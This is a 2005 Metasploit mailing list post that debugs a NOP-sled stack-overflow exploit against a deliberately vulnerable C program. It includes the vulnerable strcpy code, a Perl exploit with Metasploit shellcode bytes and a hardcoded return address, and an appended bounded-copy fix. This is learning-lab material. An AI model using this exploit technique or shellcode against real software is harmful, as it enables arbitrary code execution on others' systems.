Metasploit mailing list archives

Nop sled problem


From: shellsangel at gmail.com (shells angel)
Date: Thu, 3 Nov 2005 14:29:31 +0100

Hi,

At the moment I'm trying to exploit a trivial stack overflow in the
following C program:

---stack_vuln1.c---
#include <stdio.h>
#include <string.h>   /* strcpy */

void vuln(char *str)
{
    char buff[128];
    /* unbounded copy: an argument longer than 128 bytes overruns buff,
       the saved EBP and the saved return address */
    strcpy(buff, str);
    printf("buff at %x contains: %s\n", buff, buff);
}

int main(int argc, char *argv[])
{
    vuln(argv[1]);
    return 0;
}
---end of stack_vuln1.c---

To exploit the program I've written this exploit in perl:
---exploit code---
#!/usr/bin/perl -w

use strict;

# linux_ia32_exec - CMD=ls Size=64 Encoder=PexFnstenvSub
# http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xf6\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb4".
"\x96\x4d\x1d\x83\xeb\xfc\xe2\xf4\xde\x9d\x15\x84\xe6\xf0\x25\x30".
"\xd7\x1f\xaa\x75\x9b\xe5\x25\x1d\xdc\xb9\x2f\x74\xda\x1f\xae\x4f".
"\x5c\x95\x4d\x1d\xb4\xfa\x3e\x1d\xe3\xc5\xc4\xfc\x79\x16\x4d\x1d";

# buff[128] plus the 4-byte saved EBP: the saved return address is at offset 132
my $buffer_length = 128;
my $eip_offset = $buffer_length + 4;
# pad with NOPs so the return address lands exactly at $eip_offset
my $nop_sled = "\x90" x ($eip_offset - length($shellcode));

# address inside the sled, packed as a native 32-bit integer (little-endian on ia32)
my $ret = pack('i', 0xbffff938);
my $payload = $nop_sled . $shellcode . $ret . "\0";

exec './stack_vuln1', $payload;
---end of exploit code---

As you can see, I borrowed the shellcode from the metasploit framework. This
shellcode is located at this url:

http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x813862cc%29&MODULE=linux_ia32_exec&MODE=GENERATE&OPT_CMD=ls&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload


The problem I'm experiencing is somehow related to the nop sled. Whenever I
change the line:

my $payload = $nop_sled . $shellcode . $ret . "\0";

to:

my $payload = $shellcode . $nop_sled . $ret . "\0";

the shellcode will get executed correctly. But as far as I understand, this
renders the entire nop sled useless because the RET address will jump
directly to the beginning of the shellcode. Otherwise (placing the shellcode
behind the nop sled) the program crashes due to a Segmentation Fault. The
odd thing is that the nop sled will get executed along with a part of the
shellcode (checked it with GDB). Does anyone know what the problem could
be?

Thanks in advance,

shellsangel
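An added example, not part of shellsangel's post: the vuln() from stack_vuln1.c rewritten with a bounded copy that refuses any argument long enough to reach the saved EBP or the return address (the 132-byte $eip_offset the exploit above relies on). The names copy_bounded and vuln_safe are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Frame layout the exploit in the post relies on (32-bit x86, no stack
 * protector): buff[128], then the saved EBP (4 bytes), then the saved return
 * address at offset 128 + 4 = 132, the post's $eip_offset. */
#define BUFF_SIZE 128

/* copy_bounded (hypothetical name): copy src into dst only if it fits in
 * dst_size bytes including the terminating NUL. Returns 0 on success and -1
 * if src is too long; on failure nothing is written, so the caller never
 * ends up with a truncated, unterminated buffer. */
static int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    /* C11 guarantees memchr stops at the first match, so this never reads
     * past the terminator of a short src. */
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL)            /* no NUL within dst_size bytes: too long */
        return -1;
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* vuln_safe (hypothetical name): same observable behaviour as vuln() for
 * inputs up to 127 bytes; inputs that would overrun buff are rejected
 * instead of copied, so the saved EBP and return address stay intact. */
int vuln_safe(const char *str)
{
    char buff[BUFF_SIZE];
    if (copy_bounded(buff, sizeof buff, str) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buff - 1);
        return -1;
    }
    printf("buff at %p contains: %s\n", (void *)buff, buff);
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    return vuln_safe(argv[1]) == 0 ? 0 : 1;
}
```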